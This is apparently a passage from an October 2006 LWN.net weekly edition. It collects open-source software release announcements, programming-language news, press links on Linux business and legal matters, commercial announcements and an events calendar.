The following new KDE software has been announced this week:
You can find more new KDE software releases at
kde-apps.org.
Comments (none posted)
The October 8, 2006 edition of the
KDE Commit-Digest
has been
announced.
"
In this week's KDE Commit-Digest: KBoard, a game canvas, gets several new
chess-based themes, whilst KSokoban gets many new levels. KPhotoAlbum imports
the winning entry from its Splashscreen Contest. Krazy and apidox (parts of
the EBN test suite) move from playground into the kdesdk module. KBlog, a
library to interface with various blogs, is imported into the PIM playground
in KDE SVN. Work begins on a GStreamer backend for Phonon. More work on Yahoo
Chatroom support in Kopete. Kexi Query Designer supports data sorting in
design and SQL view. Painting experiments with Chinese brushes in Krita."
Comments (none posted)
OSDL has
announced the "highly anticipated general release" of Portland 1.0 - a set of low-level interfaces intended to be shared between multiple free desktop systems.
"
Portland 1.0 includes a set of command line tools designed to help
Independent Software Vendors (ISVs) install and integrate their
applications in the major Linux desktop environments. The programming
interfaces, built to specifications established by freedesktop.org, provide
developers with an easy method for executing the most common installation
and integration tasks."
See
the project page for more information.
Comments (none posted)
Electronics
The OpenCollector site lists three new electronic applications:
asco 0.4.5 - a SPICE circuit optimizer, OpenPCD 0.4 - a 13.56 MHz RFID reader,
and eispice 0.4 - a ground-up re-write of the Berkeley Spice 3
simulation engine.
Comments (none posted)
Financial Applications
Version 2.0.2 of the GnuCash financial application and version
2.0.1 of GnuCash Docs have been released.
"
Personal and small business accounting in GNU/Linux will be easier and
better after today's release of GnuCash 2.0.2.
This release of the free, open source accounting program improves on the
generational advances in the last version. GnuCash 2.0 is based on
state-of-the-art gtk2 GUI technology."
Full Story (comments: none)
Games
A Meeting Summary has been posted for the October 7, 2006
WorldForge game project meeting.
"
We had a meeting again this Saturday, doing a status check and looking at the next steps to take."
Comments (none posted)
Music Applications
Version 0.2.2 of Dino, a pattern-based MIDI sequencer, is available.
"
This is only a bugfix release. 0.2.1 did not compile with more recent versions of gtkmm and GCC (I'm not sure which one of them causes it), this release fixes that."
Comments (none posted)
Web Browsers
MozillaZine
has announced the availability of Mozilla Firefox 2 Release Candidate 2.
See the
release notes for more information.
Comments (none posted)
Miscellaneous
Version 1.0 of
ANNA
is available.
"
ANNA (Artificial Neural Network Architecture) is a back-propagation neural network class developed to be a good matching class for FLTK. The distribution includes the source code and a demo which should work on Linux systems. The structure is very flexible and you can change in a simple way the number of inputs, number of hidden layers, number of neurons per layer and the outputs. A nice structure editor is included, where you can visualise the neural network structure."
Comments (none posted)
Version 0.8 of demexp is available with new features, translation work
and bug fixes.
"
demexp is an electronic voting system for wide
scale direct democracy. demexp is developed mainly to support the
democratic experience project,
but can be used in other contexts (communities, firms, ...)."
Full Story (comments: none)
The
Nepomuk project
has been announced.
"
Nepomuk is a European research project which intends to create
the "Social Semantic Desktop", a comprehensive solution of methods, data
structures, and a set of tools for extending the personal computer into a
collaborative environment, which improves the state of art in online
collaboration and personal data management and augments the intellect of
people by providing and organizing information created by single or group
efforts.
Thus, the Nepomuk project intends to provide the basis for implementations of
the idea of the "Social Semantic Desktop"."
Full Story (comments: none)
Languages and Tools
BASIC
Version 0.3 of KidBASIC
has been announced.
"
KidBASIC is an easy to use version of BASIC designed to teach young children the basics of computer programming. It has a built-in graphics mode which lets them draw pictures on screen in minutes, and a set of detailed, easy-to-follow tutorials that introduce programming concepts through fun exercises.
Version 0.3 eliminates the line-numbering syntax of previous versions, replacing it with labels. Performance has also been increased slightly. Linux source tarballs are now available."
Comments (1 posted)
Caml
The October 10, 2006 edition of the Caml Weekly News
is out with new Caml language articles.
Topics include: Bindlib 3.0, float rounding, Memoization, Ancient module,
and ocamlopt under win32.
Full Story (comments: none)
Haskell
The October 3, 2006 edition of the
Haskell Weekly News
is online.
"
Developments this week include Lennart Kolmodin's new inotify bindings
for Haskell, work begins on Spanish translations of Haskell literature,
and new versions of Darcs and Cabal have been tagged."
Comments (none posted)
Java
Version 3.8 of PMD, a Java source code analyzer,
has been released.
"
PMD 3.8 has four fine new rules: BrokenNullCheck (by Wouter Zelle), AvoidRethrowingException (by George Thomas), and UnnecessaryWrapperObjectCreation and UselessStringValueOf, both written by Xavier Le Vourch. There are a slew of bugfixes and improvements to various rules".
Comments (none posted)
Version 3.4 of YALE, a Java environment for machine learning and data
mining,
is available.
"
Besides other major improvements and several
bugfixes, this version also contains a new macro
system and provides further improved plotting
techniques."
Comments (none posted)
Sunil Patil
discusses Java content repositories on O'Reilly.
"
You might have heard of JSR-170, but what is a content repository, and what
can you do with it? Well, do you want to manage documents with versioning,
search, access control, and more? Content repositories offer these features,
and JSR-170 codifies them into a single API. Sunil Patil shows how to use the
reference implementation--Apache Jackrabbit--to create a blogging application."
Comments (none posted)
Lisp
Version 2.40 of GNU CLISP, a Common Lisp implementation, is out.
"
This version provides
new configuration and build options, new socket functions, improved
debugging information, and the usual bug fixes."
Full Story (comments: none)
Perl
The October 1-7, 2006 edition of the
Weekly Perl 6 mailing list summary has been published.
Take a look for the latest Perl 6 developments.
Comments (none posted)
PHP
Stable version 1.2.4 of KCAPTCHA
has been announced.
"
KCAPTCHA provides CAPTCHA (a visual human validation tool) with font distortion. It requires no PHP font libraries (only GD). "
Comments (1 posted)
Python
Version 1.1.6 beta 2 of the
Python Imaging Library, a collection of image processing utilities,
is out with new features and bug fixes.
See the
changes
document for details.
Comments (none posted)
The python-dev Summary for August 1-15, 2006 is out with coverage of the
python-dev mailing list.
Full Story (comments: none)
The October 10, 2006 edition of Dr. Dobb's Python-URL! is online with
a new collection of Python article links.
Full Story (comments: none)
Tcl/Tk
The October 10, 2006 edition of Dr. Dobb's Tcl-URL! is online with new
Tcl/Tk articles and resources.
Full Story (comments: none)
Miscellaneous
Stable version 1.0 of Cloak
has been announced.
"
Cloak (from Comment Locator) is a source code comment extraction and archiving utility. It has many potential uses, but the initial intent was the indexing and searching of comments in code."
Comments (none posted)
Page editor: Forrest Cook
Linux in the news
Recommended Reading
ZDNet
looks at
the new
Google Code Search
site.
"
Google is taking its search expertise to one of its favorite audiences: software developers.
The company on Thursday launched a Web site, Google Code Search, which the company says will let programmers search billions of lines of code for tips on how to write their own software.
The service, conceived by the Google Labs early technology group, will crawl publicly available code, most of which is made available through open-source projects. The search and indexing covers code on Web pages and code that resides in compressed files, said Tom Stocky, a product manager at Google."
Comments (23 posted)
The Jem Report has published
an article on
the OLPC/NDA issue featuring interviews with a number of people,
including Richard Stallman: "
I have never signed an NDA for generally
useful technical information, and I don't want to start now. On the other
hand, I can see how, since it eliminates a greater wrong, it can be
justified in this case. It is an unfortunate example, but it could also
eliminate the problem."
Comments (22 posted)
Trade Shows and Conferences
Linux.com
covers the Ohio LinuxFest 2006.
"
More than 1,000 people turned out on Saturday for the Ohio LinuxFest 2006 at the Greater Columbus Convention Center (GCCC) in downtown Columbus, Ohio. The LinuxFest featured big-name speakers such as Jon 'maddog' Hall, Chris DiBona, and Jeff Waugh, and live penguins from the Columbus Zoo."
Comments (none posted)
The SCO Problem
Time for an update from SCOland: Groklaw has
the declaration from Lawrence Goldfarb, one of the founders of BayStar. "
Sometime in 2003, I was approached by Richard Emerson (Microsoft's senior vice president for corporate development and strategy) about investing in SCO, a company about which I knew little or nothing at the time. Mr. Emerson stated that Microsoft wished to promote SCO and its pending lawsuit about IBM and the Linux operating system. But Microsoft did not want to be seen as attacking IBM or Linux. For that reason, Microsoft wanted to further its interest through independent investors like BayStar." The bad news, from SCO's point of view, is that, according to this testimony, IBM had nothing to do with BayStar's subsequent decision to bail out of the SCO investment.
Comments (3 posted)
Companies
ZDNet
takes a
look at Canonical's business model. "
If you want to understand
Canonical's Linux business strategy, think Red Hat 2000. Canonical is the
65-employee start-up behind a popular version of Linux called "Ubuntu". The
company is betting that it can win a place in the market using a strategy
that dominant Linux seller Red Hat has dropped."
Comments (26 posted)
Linux-Watch
covers
Red Hat's hiring of Mark Enzweiler.
"
Everyone in the channel business knows that Red Hat Inc. has never done all that well by its system integrator, value-added reseller, and solution provider partners. Things are about to change, however, with the hiring of Mark Enzweiler as its VP North American Channel Sales. Enzweiler is extremely well regarded in channel circles."
Comments (2 posted)
IT Manager's Journal
covers
Terra Soft Solutions. "
The announcement last year that Apple was
moving to Intel-based hardware might have seemed like a fatal blow to Terra
Soft Solutions, a company best-known for the Yellow Dog Linux
distro. However, Kai Staats, CEO of Terra Soft, says that the move may be a
blessing in disguise. The company has moved on to bigger and better
ventures -- including construction of the first Cell-based supercomputing
cluster."
Comments (none posted)
Legal
Linux.com
covers some
allegations of GPL violations. "
In July, Konsole author Lars Doelle
posted a note on the MotorolaFans.com forum about two programs that appear
to violate the GNU General Public License (GPL), under which Konsole is
licensed. GPL violations are nothing new, but in this case Doelle has not
only put the violators on notice, he's also telling users to stop using the
offending programs as well."
Comments (22 posted)
Resources
Linux.com
uses MP3FS
to play FLAC files on an MP3 player. "
I don't know if the folks at
Xiph.org can live day-in and day-out using only the free Vorbis, FLAC,
Speex, and Theora codecs, but the rest of us routinely run into consumer
devices that don't recognize and support them. But with a little help from
Filesystem in Userspace (FUSE) and MP3FS, you cross one incompatibility off
that list. MP3FS lets you mount a directory hierarchy of FLAC audio files
and transparently present them as MP3s to software and hardware devices
alike."
Comments (9 posted)
O'ReillyNet
covers
the use of fwbuilder on FreeBSD. "
Before creating the rules you need
within fwbuilder to share your internet connection, make sure that your
network is properly set up. The computer running fwbuilder needs to have a
NIC, which it uses to communicate with the other computers in your home
network. This NIC is separate from the hardware you use to communicate with
your ISP; that might also be a NIC (in the case of a cable or DSL
connection) or it might be a modem (in the case of a dial-up PPP
connection). Make sure the NIC you use to communicate with your other
computers is plugged into the same hub or switch as your other
computers."
Comments (none posted)
Rick Lehrbaum
tests
seven single-CD Linux distributions on an old IBM ThinkPad laptop.
"
Like most companies, my employer has a stash of old, "obsolete" PCs and laptops that won't run the latest versions of Windows worth a darn. Naturally, this represents a great source of systems for testing the latest Linux distributions.
I thought it would be interesting to find out which modern Linux distro made the best OS for a supposedly "obsolete" old laptop."
Comments (15 posted)
Linux.com
looks at
xjobs. "
Ever feel like you're not getting the most out of your
multiprocessor machine? The xjobs utility allows you to schedule several
processes to run simultaneously to make the most of your system's
resources. Xjobs takes a list of arguments from standard input and passes
them to a utility, or takes a list of commands from a script, and then runs
the jobs in parallel. If you have a multiprocessor machine, xjobs will
automatically run one job per processor by default."
Comments (8 posted)
developerWorks has put up
a
survey of source code management systems which run on Linux.
"
Arch is a specification for a decentralized SCM that offers many
different implementations. These include ArX, Bazaar, GNU arch, and
Larch. Arch not only operates as a decentralized SCM, but also uses the
changeset model. The Arch SCM is a
popular method for open source development because developers can develop
on separate repositories with full source control. This is because the
distributed repositories are actual repositories complete with revision
control. You can create a patch from changes in the local repository to be
used by an upstream developer. This is the real power of the decentralized
model." (Thanks to Jake Edge).
Comments (10 posted)
Reviews
Linux.com
reviews the
book
ImageMagick Tricks from Packt Publishing.
"
Command-line utilities can be powerful, but it takes some doing to
make a typical desktop user work in the shell. The image manipulation
program ImageMagick is one command-line program that gives users a good
reason to use the CLI. Now Packt Publishing has released ImageMagick
Tricks, a book that covers ImageMagick from the ground up. If you've never
used ImageMagick before, this book is a good starting place."
Comments (1 posted)
Linux.com
plays with
Neuro-Evolving Robotic Operatives (N.E.R.O.). "
If you've ever been
frustrated with the artificial intelligence (AI) in video games, then you
are a prime candidate for Neuro-Evolving Robotic Operatives (N.E.R.O.), a
cross-platform combat game where the key to winning is training your own
intelligent non-player characters. On the field of play, the only rule is
"let the best AI win." I tested my skills with the Linux client, and found
N.E.R.O. to be a very different sort of game."
Comments (1 posted)
Linux.com
looks at recent improvements to the OO.o chart module.
"
Want to see a dinosaur? Press the Chart button in OpenOffice.org Calc, and you will be presented with a real software relic. While other parts of OpenOffice.org have been thoroughly redesigned and updated, the features and the overall look of the chart module remain virtually untouched since version 1.0. The situation is changing, though, as a group of OpenOffice.org developers has started to work on a new chart module. The first results of their endeavors were presented on this year's OOoCon. Here is what they've done so far."
Comments (12 posted)
Miscellaneous
Steven J. Vaughan-Nichols
remembers Ray
Noorda. "
Indeed, not long before he retired because of the onslaught
of Alzheimer's, Noorda believed that Linux was the future for Novell and
supported Bryan Sparks and Ransom Love in an internal Linux skunkworks
project. Novell, by then under Bob Frankenberg, killed off the Linux
project. Soon thereafter, Noorda cut his ties with Novell. Noorda wasn't
done with Linux even if the Novell of the mid-90s was. He used his
investment company, The Canopy Group, to bankroll Caldera Systems, one of
the first Linux companies."
Comments (3 posted)
Page editor: Forrest Cook
Announcements
Non-Commercial announcements
Remember the Eudora mail client? Qualcomm has
announced that it will be working with Mozilla to make an open-source version of Eudora based on Thunderbird. "
Future versions of Eudora
will be free and open source, while retaining Eudora's uniquely rich
feature set and productivity enhancements. QUALCOMM and Mozilla will each
participate in, and continue to foster development communities based around
the open source Mozilla project, with a view to enhancing the capabilities
and ease of use of both Eudora and Thunderbird."
Comments (2 posted)
Commercial announcements
Agilysys, Inc. has
announced a partnership with Red Hat.
"
Agilysys, Inc., a leading provider of enterprise computer
technology solutions, and Red Hat, Inc., the world's leading
provider of open source solutions to the enterprise, today announced that
the two companies have signed an enterprise reseller agreement to deliver
Red Hat solutions and the benefits of open source to Agilysys customers."
Comments (none posted)
Mandriva has announced the signing of a definitive agreement to
acquire Linbox, pending shareholder approval.
"
Active in both the Open Source and Linux markets for 10 years, Linbox
develops and markets software infrastructure administration products
for medium to large organizations. The software products marketed by
the company encompass authentication, back up and asset management,
and more. Linbox has two flagship products, Linbox Directory Server
("LDS") and Linbox Rescue Server ("LRS")."
Full Story (comments: none)
Terra Soft has announced the construction of the first Cell-based
supercomputing cluster.
"
In the fall of '05, Terra Soft was contacted by Sony Computer Entertainment,
Inc. (SCEI) to develop and manage a supercomputing cluster built upon the IBM
Cell Broadband Engine and the Linux OS. This spring, Terra Soft was
contracted by Sony and in August completed the construction of a 3000 sq-ft
supercomputing facility capable of housing 2400 1U systems. In this remodeled
extension to the Loveland, Colorado headquarters, Terra Soft will construct a
test cluster and a substantially larger production cluster."
Full Story (comments: none)
Cavium Networks, Inc. and Wind River, Inc. have
announced the availability of the Wind River Platform for Network
Equipment and Wind River VxWorks 6.1 for Cavium Networks' OCTEON
multi-core MIPS64-based processor family.
"
The OCTEON(TM) Processor family consists of 1 to 16 MIPS64 based
cnMIPS(TM) cores providing up to 16GHz of 64-bit compute processing on a
single chip. Additionally, OCTEON incorporates the most advanced
multi-layer application acceleration for networking control, data and
services applications. The OCTEON Processor family integrates up to 8
Gigabit ports, up to dual SPI-4.2, PCI-X, up to 144-bit DDR2 controller, up
to dual 18-bit RLDRAM II controllers, on-chip packet processing, QoS, TCP,
compression/ decompression, encryption and pattern matching acceleration
hardware to deliver a substantial price, performance and power benefit over
alternative solutions."
Comments (none posted)
Wyse Technology has
announced a new line of Wi-Fi enabled thin clients.
"
"The factory installed wireless capability, with the software and
hardware fully integrated, enables a variety of new applications for quick,
secure deployment in hotel lobbies, airport kiosks, hospitals and school
rooms," said Tarkan Maner, president of worldwide field operations, Wyse
Technology. "The simple, secure set-up of a horizontal or vertical
wall-mounted Wyse wireless product enables our customers to operate in
places that haven't been able to be wired with traditional Ethernet.""
Comments (none posted)
New Books
Prentice Hall has published the book
Embedded Linux Primer:
A Practical Real-World Approach by Christopher Hallinan.
Full Story (comments: none)
Prentice Hall has published the New Second Edition of
Core Python Programming, by Wesley J. Chun.
Full Story (comments: 1)
Resources
The October 5, 2006 edition of the
Free Software Foundation Europe Newsletter is online.
Topics include:
Regional and international Fellowship meetings,
FSFE at the Wizards of OS in Berlin,
Georg Greve at SERCI workshop in Helsinki, Finland,
FSFE at WIPO General Assembly and Other public appearances.
Full Story (comments: none)
Omni Technology Solutions has made available a white paper on the
advantages of using SUSE SLED 10 and openSUSE 10.1 with the Linux Desktop
Multiplier to run multiple desktops from a single machine. "
Modern PCs spend most of the
day idle. The Multiplied Linux Desktop strategy allows you to leverage this
unused computing power and connect up to 10 full-featured workstations to a
SINGLE, shared SLED 10 or openSUSE 10.1 computer. Ideal for Linux computer
labs, Linux thin clients, Linux Internet cafes and Linux point-of-sale
terminals."
Comments (none posted)
Konstantin Emelyanov of the NetUP company has put together a
detailed guide (pdf)
concerning installation and configuration of an open source PPPoE access
server. The configuration of a PPPoE client is also covered.
Education and Certification
LinuxBasics.org has announced their second free Linux class,
entitled An Introduction to Linux Basics.
The course will be held online on October 19.
"This course is designed to give a foundation of understanding of Linux
to a beginner who wants to know a little more about the system. More
advanced Linux users will find an opportunity to dig deeper into some
areas they always wanted to know more about or discover gaps in their
knowledge that they didn't know existed."
Event Reports
CMP Technology has sent out a
press release about the recent Embedded
Systems Conference.
"To enhance the attendee experience, CMP Technology introduced brand new
programs for 2006, including the Disruption Zone which featured groundbreaking
innovations from leading start-ups, those taking the next big leap forward in
revolutionizing the industry. Attendees also attended
'Live Teardowns' of popular electronics, like a Sony DVDirect(TM) MC1 Multi
Function DVD Recorder and a Roomba vacuum, while the 'Get to the Point Panel'
brought the Linux technology debate right to the exhibits floor."
A number of session reports have been posted from the Boston GNOME summit.
Topics include:
Upcoming Events
The Linux Users' Group of Davis will hold their next free
Linux Installfest on October 21, 2006 in Davis, CA.
The Open Group has
announced the agenda for the Enterprise Architecture Practitioners Conference. The event takes place in Lisbon, Portugal on October 23-26, 2006.
"The Open Group's Enterprise
Architecture Practitioners Conferences, now in their third year, are
globally recognized events created by and for enterprise architecture
practitioners to examine a wide variety of topics which are impacting the
profession. These include service-oriented architecture (SOA), agent
technologies, aligning enterprise architecture with business innovation,
and evolving the architecture discipline in line with business demand."
Events: October 19, 2006 to December 18, 2006
The following event listing is taken from the
LWN.net Calendar.
| Date(s) | Event | Location |
|---|---|---|
| October 18 - October 19 | International Conference on IT-Incident Management and IT-Forensics | Stuttgart, Germany |
| October 18 - October 22 | Pike Conference 2006 | Riga, Latvia |
| October 19 - October 21 | HackLu 2006 | Kirchberg, Luxembourg |
| October 19 - October 20 | DC PHP Conference | Washington, D.C. |
| October 20 - October 22 | aLANtejo 06 | Évora, Portugal |
| October 20 - October 22 | RubyConf 2006 | Denver, Colorado |
| October 22 - October 27 | Colorado Software Summit | Keystone, CO, USA |
| October 23 - October 24 | Mono User and Developers Meeting | Cambridge, MA, USA |
| October 23 - October 26 | Enterprise Architecture Practitioners Conf | Lisbon, Portugal |
| October 25 - October 26 | LinuxWorld UK 2006 | London, UK |
| October 25 - October 27 | Plone Conference 2006 | Seattle, WA |
| October 26 - October 27 | IT Underground | Warsaw, Poland |
| October 26 - October 27 | Free Software and Open Source Symposium | Toronto, Canada |
| October 28 | LinuxDay 2006 | Many of them, Italy |
| October 31 - November 2 | Zend/PHP Conference and Expo | San Jose, CA |
| November 1 | Ingres Users Association Conference | London, England |
| November 4 - November 8 | I Jornadas técnicas KDE de | Zaragoza, Spain |
| November 4 - November 11 | Open Source in Performance and Exhibition | London, England |
| November 5 - November 8 | International PHP Conference | Frankfurt, Germany |
| November 5 - November 10 | Ubuntu Developer Summit - Mountain View | Mountain View, CA, USA |
| November 6 - November 10 | Colorado Python seminar | Estes Park, CO, USA |
| November 7 - November 9 | 2006 Web 2.0 Conference | San Francisco, CA |
| November 9 - November 10 | Forum PHP 2006 | Paris, France |
| November 10 - November 12 | Chicago Perl Hackathon 2006 | Chicago, IL, USA |
| November 11 - November 17 | Supercomputing 2006 | Tampa, FL, USA |
| November 11 | FSFE Fellows Meeting | Bolzano, Italy |
| November 12 - November 14 | Firebird Conference 2006 | Prague, Czech Republic |
| November 14 - November 16 | LinuxWorld Cologne | Cologne, Germany |
| November 16 - November 17 | III Latin American Free Software Conference | Iguassu Falls, Brazil |
| November 16 - November 17 | Conference on Software Patents | Boston, MA, USA |
| November 18 | Richard Stallman speaks in Seoul | Seoul, South Korea |
| November 21 - November 24 | 15th International Conference on Computing | Mexico City, Mexico |
| November 24 - November 26 | FOSS.IN 2006 | Bangalore, India |
| November 25 | FAVE 2006 - free software multimedia event in London | London, UK |
| November 27 - November 30 | PacSec Applied Security Conference 2006 | Tokyo, Japan |
| December 1 - December 2 | PHP Conference Brasil | São Paulo, Brazil |
| December 2 - December 3 | Technical Dutch Open Source Event | Eindhoven, the Netherlands |
| December 3 - December 8 | Large Installation System Administration Conference | Washington, D.C. |
| December 5 - December 8 | Open Source Developers' Conference 2006 | Melbourne, Australia |
| December 7 - December 8 | Desktop Architects Meeting | Portland, OR, USA |
| December 9 | London Perl Workshop | London, England |
| December 12 - December 19 | Virtual Congress UnInet Meeting UMeet'2006 | irc.uninet.edu, #linux |
If your event does not appear here, please
tell us about it.
Web sites
wxBlog is a new blog site
for discussion about the
wxWidgets cross-platform GUI platform.
Miscellaneous
Filesystem developer Hans Reiser has been arrested on suspicion of murder
in the disappearance of his ex-wife. Some information can be found in
this
SFGate article.
Page editor: Forrest Cook